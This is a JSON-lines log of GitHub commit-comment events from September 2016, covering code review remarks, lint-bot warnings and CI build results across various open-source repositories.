{"id":"4508752189","type":"CommitCommentEvent","actor":{"login":"kaixa256"},"repo":{"name":"kaixa256/hello-word"},"payload":{"comment":{"id":18880911,"position":null,"line":null,"path":null,"commit_id":"f2c6e0ac881aef836eb2270b4063f5ca57cdaf22","created_at":"2016-09-02T14:15:31Z","updated_at":"2016-09-02T14:15:31Z","body":"learning...."}},"created_at":"2016-09-02T14:15:31Z"}
{"id":"4508753385","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18880914,"position":null,"line":null,"path":null,"commit_id":"2c3e0af93e00d7e2e20283be12541aaebabfa1bf","created_at":"2016-09-02T14:15:41Z","updated_at":"2016-09-02T14:15:41Z","body":"There's a PR at #9383, which aims to support abc.go.com. You may want to close it."}},"created_at":"2016-09-02T14:15:41Z"}
{"id":"4508754703","type":"CommitCommentEvent","actor":{"login":"CatalinFrancu"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":18880917,"position":9,"line":9,"path":"templates/contact.tpl","commit_id":"9d65954abc40eaf3a9c0cd4d3d499d1b1dc5fbf0","created_at":"2016-09-02T14:15:56Z","updated_at":"2016-09-02T14:15:56Z","body":"Știam eu că cineva o să se prindă. :-) Reparat de 01a4638a78ef04edcdd8429ef239381ad3a912fe."}},"created_at":"2016-09-02T14:15:56Z"}
{"id":"4508755651","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":18880921,"position":null,"line":null,"path":null,"commit_id":"b72eec1e721c199c9eff4d37c023220b0543c69c","created_at":"2016-09-02T14:16:09Z","updated_at":"2016-09-02T14:16:09Z","body":"👍 "}},"created_at":"2016-09-02T14:16:09Z"}
{"id":"4508756608","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18880926,"position":null,"line":null,"path":null,"commit_id":"3bf0a5c782b3a0e9579ffef511bff71fca8a8188","created_at":"2016-09-02T14:16:19Z","updated_at":"2016-09-02T14:16:19Z","body":"👍 "}},"created_at":"2016-09-02T14:16:19Z"}
{"id":"4508760752","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18880941,"position":28,"line":30,"path":"subprojects/docs/src/docs/release/notes.md","commit_id":"60bfd7dcce64d9a4e394148012e328ab365e0093","created_at":"2016-09-02T14:17:05Z","updated_at":"2016-09-02T14:17:05Z","body":"The statement about combining into one \"big\" build can be scary and kind of hides the use case which is described below, splitting a build into multiple ones."}},"created_at":"2016-09-02T14:17:05Z"}
{"id":"4508761560","type":"CommitCommentEvent","actor":{"login":"wildlux"},"repo":{"name":"wildlux/kivy-Reposity"},"payload":{"comment":{"id":18880942,"position":null,"line":null,"path":null,"commit_id":"a34c62231e9dd10f4a9e573da1619d05a8260b2e","created_at":"2016-09-02T14:17:13Z","updated_at":"2016-09-02T14:17:13Z","body":"Error for this test...."}},"created_at":"2016-09-02T14:17:13Z"}
{"id":"4508762899","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":18880946,"position":null,"line":null,"path":null,"commit_id":"d607e6801d445cf43a9a28cf499ef9c2416a8ffd","created_at":"2016-09-02T14:17:27Z","updated_at":"2016-09-02T14:17:27Z","body":"> Is the raw error code the response from the processor, issuer?\r\n\r\nIt's the ISO response message from Visa and MasterCard (it doesn't look like we can get it for other schemes unfortunately)."}},"created_at":"2016-09-02T14:17:27Z"}
{"id":"4508764635","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18880954,"position":null,"line":null,"path":null,"commit_id":"92217af7d9f08086c6a88889e6c95c40a8ed4d24","created_at":"2016-09-02T14:17:46Z","updated_at":"2016-09-02T14:17:46Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Wgo0cQdqSHSS1hKdGPnRZQ"}},"created_at":"2016-09-02T14:17:46Z"}
{"id":"4508774414","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":18880971,"position":null,"line":null,"path":null,"commit_id":"df2d223a285bdc80a369532c073412ea6cdbf35a","created_at":"2016-09-02T14:19:35Z","updated_at":"2016-09-02T14:19:35Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-PullRequest.449+37](http://build.prxm.it:8813/viewLog.html?buildId=3648&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:25"}},"created_at":"2016-09-02T14:19:35Z"}
{"id":"4508780038","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18880983,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T14:20:38Z","updated_at":"2016-09-02T14:20:38Z","body":"I have 0,0 pixeling - it just start to stutter (Kodi as client) - maybe test x264 without hw if this helps or if this always happen (10% should be no problem at all for the cpu)"}},"created_at":"2016-09-02T14:20:38Z"}
{"id":"4508781146","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":18880985,"position":null,"line":null,"path":null,"commit_id":"df2d223a285bdc80a369532c073412ea6cdbf35a","created_at":"2016-09-02T14:20:49Z","updated_at":"2016-09-02T14:20:49Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-logRefactoring.36](http://build.prxm.it:8813/viewLog.html?buildId=3649&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:13"}},"created_at":"2016-09-02T14:20:49Z"}
{"id":"4508781323","type":"CommitCommentEvent","actor":{"login":"gustavobigardi"},"repo":{"name":"goatslacker/alt"},"payload":{"comment":{"id":18880986,"position":null,"line":null,"path":null,"commit_id":"5b41cadc33b425c53c925de4cb0dafefe7a20982","created_at":"2016-09-02T14:20:51Z","updated_at":"2016-09-02T14:20:51Z","body":"+1"}},"created_at":"2016-09-02T14:20:51Z"}
{"id":"4508783754","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18880999,"position":27,"line":30,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-02T14:21:21Z","updated_at":"2016-09-02T14:21:21Z","body":"Ok yes I see what you mean - in this particular case I would say it is ok to modify it since once we have read and utilized the value to determine the breakpoints we won't need it again.\r\n\r\nI'd like to go with the underscore convention (will update in my next commit).\r\n\r\nAnd regarding assignment - yes that's a bad habit so you're right to call me out on it. I'll correct that and try to remember in future :-)"}},"created_at":"2016-09-02T14:21:21Z"}
{"id":"4508789761","type":"CommitCommentEvent","actor":{"login":"lzap"},"repo":{"name":"theforeman/foreman_templates"},"payload":{"comment":{"id":18881025,"position":5,"line":113,"path":"app/services/foreman_templates/template_importer.rb","commit_id":"36ec03310c36eb997a12dac2cafaa0ff90f49b4b","created_at":"2016-09-02T14:22:29Z","updated_at":"2016-09-02T14:22:29Z","body":"Leftover perhaps? Looks great!"}},"created_at":"2016-09-02T14:22:29Z"}
{"id":"4508792902","type":"CommitCommentEvent","actor":{"login":"MikayelSmbatian"},"repo":{"name":"MikayelSmbatian/TellPhoneBookSkeleton"},"payload":{"comment":{"id":18881033,"position":null,"line":null,"path":null,"commit_id":"f428bc505814fcdbfa2275ea669f30366834ea7d","created_at":"2016-09-02T14:23:01Z","updated_at":"2016-09-02T14:23:01Z","body":"Repository layer works with DB. So I couldn't imagine what to write. If I\nbegin to implement the skeleton actually there will be more util methods in\nthe layer.\nMain class begins executing.\nI couldn't create controller class static so I made it singleton\nThat fields also would appear if I implemented the skeleton\n\n2016-09-02 16:04 GMT+04:00 hovhanneskhalatyan <notifications@github.com>:\n\n> I can't find repository layer.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MikayelSmbatian/TellPhoneBookSkeleton/commit/f428bc505814fcdbfa2275ea669f30366834ea7d#commitcomment-18879164>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT8Pz0ERQNcLn-JmVPu8U-9FoGZonrCsks5qmBDDgaJpZM4Jzolr>\n> .\n>\n"}},"created_at":"2016-09-02T14:23:01Z"}
{"id":"4508794695","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881037,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:20Z","updated_at":"2016-09-02T14:23:20Z","body":"PHPCS: Method name \"PayslipTest::test_import_file\" is not in camel caps format"}},"created_at":"2016-09-02T14:23:20Z"}
{"id":"4508794743","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881038,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:20Z","updated_at":"2016-09-02T14:23:20Z","body":"PHPCS: Multi-line function call not indented correctly; expected 8 spaces but found 12"}},"created_at":"2016-09-02T14:23:20Z"}
{"id":"4508794813","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881039,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:21Z","updated_at":"2016-09-02T14:23:21Z","body":"PHPCS: Closing parenthesis of a multi-line function call must be on a line by itself"}},"created_at":"2016-09-02T14:23:21Z"}
{"id":"4508795525","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18881041,"position":null,"line":null,"path":null,"commit_id":"2c3e0af93e00d7e2e20283be12541aaebabfa1bf","created_at":"2016-09-02T14:23:26Z","updated_at":"2016-09-02T14:23:26Z","body":"this will work only for short videos, full episodes require obtaining an uplynk session."}},"created_at":"2016-09-02T14:23:26Z"}
{"id":"4508796606","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881046,"position":7,"line":null,"path":"tests/PayslipTest.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:40Z","updated_at":"2016-09-02T14:23:40Z","body":"Class PayslipTest is missing a docblock."}},"created_at":"2016-09-02T14:23:40Z"}
{"id":"4508796649","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881047,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:40Z","updated_at":"2016-09-02T14:23:40Z","body":"PayslipTest::test_import_file is missing a docblock."}},"created_at":"2016-09-02T14:23:40Z"}
{"id":"4508796698","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881048,"position":38,"line":null,"path":"src/Payslip.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:41Z","updated_at":"2016-09-02T14:23:41Z","body":"Payslip::getEvents is missing a docblock."}},"created_at":"2016-09-02T14:23:41Z"}
{"id":"4508797120","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881050,"position":19,"line":null,"path":"src/Parsers/Csv.php","commit_id":"978ef95255c14f4a6096c3b8a4d0570556cf2604","created_at":"2016-09-02T14:23:45Z","updated_at":"2016-09-02T14:23:45Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-02T14:23:45Z"}
{"id":"4508799620","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881055,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:13Z","updated_at":"2016-09-02T14:24:13Z","body":"PHPCS: Method name \"PayslipTest::test_import_file\" is not in camel caps format"}},"created_at":"2016-09-02T14:24:13Z"}
{"id":"4508799682","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881056,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:14Z","updated_at":"2016-09-02T14:24:14Z","body":"PHPCS: Multi-line function call not indented correctly; expected 8 spaces but found 12"}},"created_at":"2016-09-02T14:24:14Z"}
{"id":"4508799720","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881057,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:14Z","updated_at":"2016-09-02T14:24:14Z","body":"PHPCS: Closing parenthesis of a multi-line function call must be on a line by itself"}},"created_at":"2016-09-02T14:24:14Z"}
{"id":"4508801631","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881060,"position":7,"line":null,"path":"tests/PayslipTest.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:33Z","updated_at":"2016-09-02T14:24:33Z","body":"Class PayslipTest is missing a docblock."}},"created_at":"2016-09-02T14:24:33Z"}
{"id":"4508801667","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881061,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:34Z","updated_at":"2016-09-02T14:24:34Z","body":"PayslipTest::test_import_file is missing a docblock."}},"created_at":"2016-09-02T14:24:34Z"}
{"id":"4508802107","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881066,"position":19,"line":null,"path":"src/Parsers/Csv.php","commit_id":"7357846ad0bbf1e37d7ee898a4606f594f09e30b","created_at":"2016-09-02T14:24:39Z","updated_at":"2016-09-02T14:24:39Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-02T14:24:39Z"}
{"id":"4508802213","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18881067,"position":null,"line":null,"path":null,"commit_id":"2c3e0af93e00d7e2e20283be12541aaebabfa1bf","created_at":"2016-09-02T14:24:40Z","updated_at":"2016-09-02T14:24:40Z","body":"Got it so #9383 should be rebased."}},"created_at":"2016-09-02T14:24:40Z"}
{"id":"4508802787","type":"CommitCommentEvent","actor":{"login":"q2dg"},"repo":{"name":"arduino-libraries/USBHost"},"payload":{"comment":{"id":18881070,"position":null,"line":null,"path":null,"commit_id":"a0f9e00adbe7adbc8d6d70ff137a6dca701f4f53","created_at":"2016-09-02T14:24:46Z","updated_at":"2016-09-02T14:24:46Z","body":"Thanks. Sorry for being so burdensome but...do you think it should be also noticed the existence of this alternative library (https://github.com/arduino/ArduinoCore-samd/tree/master/libraries/USBHost) to Zero and MKR1000 boards? "}},"created_at":"2016-09-02T14:24:46Z"}
{"id":"4508804241","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881075,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:02Z","updated_at":"2016-09-02T14:25:02Z","body":"PHPCS: Method name \"PayslipTest::test_import_file\" is not in camel caps format"}},"created_at":"2016-09-02T14:25:02Z"}
{"id":"4508804308","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881076,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:03Z","updated_at":"2016-09-02T14:25:03Z","body":"PHPCS: Multi-line function call not indented correctly; expected 8 spaces but found 12"}},"created_at":"2016-09-02T14:25:03Z"}
{"id":"4508804363","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881077,"position":28,"line":null,"path":"tests/PayslipTest.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:03Z","updated_at":"2016-09-02T14:25:03Z","body":"PHPCS: Closing parenthesis of a multi-line function call must be on a line by itself"}},"created_at":"2016-09-02T14:25:03Z"}
{"id":"4508806086","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881079,"position":7,"line":null,"path":"tests/PayslipTest.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:23Z","updated_at":"2016-09-02T14:25:23Z","body":"Class PayslipTest is missing a docblock."}},"created_at":"2016-09-02T14:25:23Z"}
{"id":"4508806126","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881080,"position":9,"line":null,"path":"tests/PayslipTest.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:23Z","updated_at":"2016-09-02T14:25:23Z","body":"PayslipTest::test_import_file is missing a docblock."}},"created_at":"2016-09-02T14:25:23Z"}
{"id":"4508806196","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881082,"position":38,"line":null,"path":"src/Payslip.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:24Z","updated_at":"2016-09-02T14:25:24Z","body":"Payslip::getEvents is missing a docblock."}},"created_at":"2016-09-02T14:25:24Z"}
{"id":"4508806724","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881085,"position":19,"line":null,"path":"src/Parsers/Csv.php","commit_id":"665079bd2535fe1d5da29d2945da25ffee04e0bc","created_at":"2016-09-02T14:25:28Z","updated_at":"2016-09-02T14:25:28Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-02T14:25:28Z"}
{"id":"4508806951","type":"CommitCommentEvent","actor":{"login":"lambdageek"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":18881086,"position":16,"line":284,"path":"mono/metadata/icall-def.h","commit_id":"f61f85579443e6f684f67bc7d2c548b5f5e202f2","created_at":"2016-09-02T14:25:30Z","updated_at":"2016-09-02T14:25:30Z","body":"Okay, sorry about that.\r\n\r\nI'm not too clear on what requires a version bump - I thought it was only needed if an icall sig changes without a name change, while for adding/removing calls it wasn't needed."}},"created_at":"2016-09-02T14:25:30Z"}
{"id":"4508808200","type":"CommitCommentEvent","actor":{"login":"akhanzode"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":18881089,"position":28,"line":28,"path":"tests/test_apps/kafkaimporter/custom_import_formatter/formatter/ExampleFormatter.java","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-02T14:25:45Z","updated_at":"2016-09-02T14:25:45Z","body":"You dont need to initialize"}},"created_at":"2016-09-02T14:25:45Z"}
{"id":"4508808719","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881091,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:25:50Z","updated_at":"2016-09-02T14:25:50Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T14:25:50Z"}
{"id":"4508808761","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881092,"position":19,"line":null,"path":"src/Orm.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:25:51Z","updated_at":"2016-09-02T14:25:51Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T14:25:51Z"}
{"id":"4508809681","type":"CommitCommentEvent","actor":{"login":"MManahi"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18881094,"position":23,"line":23,"path":"DiscountTest.php","commit_id":"b41f6e0c738f5c863b1e715f00f7487bffa76279","created_at":"2016-09-02T14:26:01Z","updated_at":"2016-09-02T14:26:01Z","body":"I'm not familiar with i'll change it, but in camel case :)  "}},"created_at":"2016-09-02T14:26:01Z"}
{"id":"4508810356","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881100,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:10Z","updated_at":"2016-09-02T14:26:10Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T14:26:10Z"}
{"id":"4508810404","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881102,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:11Z","updated_at":"2016-09-02T14:26:11Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T14:26:11Z"}
{"id":"4508810406","type":"CommitCommentEvent","actor":{"login":"akhanzode"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":18881101,"position":30,"line":30,"path":"tests/test_apps/kafkaimporter/custom_import_formatter/formatter/ExampleFormatter.java","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-02T14:26:11Z","updated_at":"2016-09-02T14:26:11Z","body":"Also can you inject some randomization that transform throws exception."}},"created_at":"2016-09-02T14:26:11Z"}
{"id":"4508810454","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881103,"position":5,"line":null,"path":"src/Orm.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:11Z","updated_at":"2016-09-02T14:26:11Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T14:26:11Z"}
{"id":"4508810504","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881104,"position":11,"line":null,"path":"src/Orm.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:12Z","updated_at":"2016-09-02T14:26:12Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T14:26:12Z"}
{"id":"4508810537","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881105,"position":17,"line":null,"path":"src/Orm.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:12Z","updated_at":"2016-09-02T14:26:12Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T14:26:12Z"}
{"id":"4508810652","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/nlp_text_correction_prediction"},"payload":{"comment":{"id":18881106,"position":null,"line":null,"path":null,"commit_id":"17e10a4fd32eb1935a2c9aa57348a51dc9153bfb","created_at":"2016-09-02T14:26:13Z","updated_at":"2016-09-02T14:26:13Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:26:13Z"}
{"id":"4508810963","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881108,"position":20,"line":null,"path":"src/Orm.php","commit_id":"dae7a9c7da877bec2652168826d7c15ae7295ff4","created_at":"2016-09-02T14:26:17Z","updated_at":"2016-09-02T14:26:17Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T14:26:17Z"}
{"id":"4508812290","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/nlp_twitter_sentiment_analysis"},"payload":{"comment":{"id":18881111,"position":null,"line":null,"path":null,"commit_id":"e17d263424c7743afa306f0ce915957c0596f0a2","created_at":"2016-09-02T14:26:31Z","updated_at":"2016-09-02T14:26:31Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:26:31Z"}
{"id":"4508812807","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18881112,"position":null,"line":null,"path":null,"commit_id":"978727b4cfcc19de56f1e9df386ae447e3611277","created_at":"2016-09-02T14:26:36Z","updated_at":"2016-09-02T14:26:36Z","body":"saw approval from nickelization\nat https://github.com/basho/yokozuna/commit/978727b4cfcc19de56f1e9df386ae447e3611277"}},"created_at":"2016-09-02T14:26:36Z"}
{"id":"4508812857","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18881113,"position":null,"line":null,"path":null,"commit_id":"978727b4cfcc19de56f1e9df386ae447e3611277","created_at":"2016-09-02T14:26:36Z","updated_at":"2016-09-02T14:26:36Z","body":"merging basho/yokozuna/develop-2.2-job-switches = 978727b4 into borshop-integration-671-develop-2.2-job-switches"}},"created_at":"2016-09-02T14:26:36Z"}
{"id":"4508812876","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18881114,"position":null,"line":null,"path":null,"commit_id":"978727b4cfcc19de56f1e9df386ae447e3611277","created_at":"2016-09-02T14:26:37Z","updated_at":"2016-09-02T14:26:37Z","body":"basho/yokozuna/develop-2.2-job-switches = 978727b4 merged ok, testing candidate = ff312daf"}},"created_at":"2016-09-02T14:26:37Z"}
{"id":"4508812951","type":"CommitCommentEvent","actor":{"login":"akhanzode"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":18881116,"position":5,"line":4,"path":"tests/test_apps/customimporter/exampleformatter/build.xml","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-02T14:26:38Z","updated_at":"2016-09-02T14:26:38Z","body":"why /home/pshaw?"}},"created_at":"2016-09-02T14:26:38Z"}
{"id":"4508813290","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881117,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:26:40Z","updated_at":"2016-09-02T14:26:40Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T14:26:40Z"}
{"id":"4508813318","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18881119,"position":19,"line":null,"path":"src/Orm.php","commit_id":"8d620c166947a13ee4cddc6e869df184d276f3f5","created_at":"2016-09-02T14:26:41Z","updated_at":"2016-09-02T14:26:41Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T14:26:41Z"}
{"id":"4508813714","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/titanic_passengers_classification"},"payload":{"comment":{"id":18881121,"position":null,"line":null,"path":null,"commit_id":"53f74c1a349b15fedb04ceed39556c2a29dc62ea","created_at":"2016-09-02T14:26:45Z","updated_at":"2016-09-02T14:26:45Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:26:45Z"}
{"id":"4508814645","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/boston_housing_price_regression"},"payload":{"comment":{"id":18881124,"position":null,"line":null,"path":null,"commit_id":"31e46b355a7ba0ad4303b563248b677bbf6c55a0","created_at":"2016-09-02T14:26:56Z","updated_at":"2016-09-02T14:26:56Z","body":"docs: Updated the readme.md file, to include a more detailed description of the project"}},"created_at":"2016-09-02T14:26:56Z"}
